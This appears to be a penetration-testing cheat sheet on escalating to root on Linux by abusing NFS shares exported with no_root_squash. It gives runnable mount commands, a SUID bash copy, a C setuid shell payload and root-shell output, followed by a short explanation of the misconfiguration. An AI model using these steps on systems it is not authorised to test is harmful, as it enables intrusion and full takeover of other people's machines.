NFS exploits¶
Become root on Linux via NFS exploits:
Look for no_root_squash shares
Mount share
Create a payload
Bash binary with an SUID bit
C binary with an SUID bit
Execute the payload on the target mac hine to escalate privileges
Unmount the shared directory in the attacker machine
Example: /tmp share¶
Get information:
$ ps aux | grep nfsd
$ cat /etc/exports
There is a /tmp share with no_root_squash set.
Shares with the
no_root_squashoption can possibly be modified and executed as root.On the attacker machine install the NFS client package:
sudo apt install nfs-commonOn the attacker machine, create a directory to host the NFS share:
mkdir /tmp/nfsWith
sudo, mount the remote share in the/tmp/nfsdirectory
sudo mount -o rw,vers=2 <target IP address>:/tmp /tmp/nfs
Or:
sudo mount -t nfs <target IP address>:/tmp /tmp/nfs
Payload
Bash binary with an SUID bit:
sudo cp /bin/bash /tmp/nfs/bash && sudo chmod u+s /tmp/nfs/bash
C binary with an SUID bit - you may need to change the /usr/bin/bash to /bin/bash, depending on location of bash in the target machine:
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
int main() {
setresuid(0, 0, 0);
setuid(getuid());
system("/usr/bin/bash");
return 0;
}
Compile:
gcc payload.c -o payload && sudo rm /tmp/nfs/payload 2>/dev/null; sudo cp payload /tmp/nfs
Set de SUID bit:
sudo chmod u+s /tmp/nfs/payload
In the target machine, execute the payload to escalate privileges:
:/tmp$ ./bash -p
# whoami
root
# exit
:/tmp$ ./payload
:/tmp# id
uid=0(root) gid=1000(low) ...
Unmount the shared directory in the attacker machine:
sudo umount /tmp/nfs
Notes¶
The NFS configuration file is /etc/exports:
no_root_squash: This option basically gives authority to the root user on the client (us, our attacker host) to access files on the NFS server as root. This is bad, as we can create malicious files on the NFS share as the root user.no_all_squash: This is similar to no_root_squash option but applies to non-root users.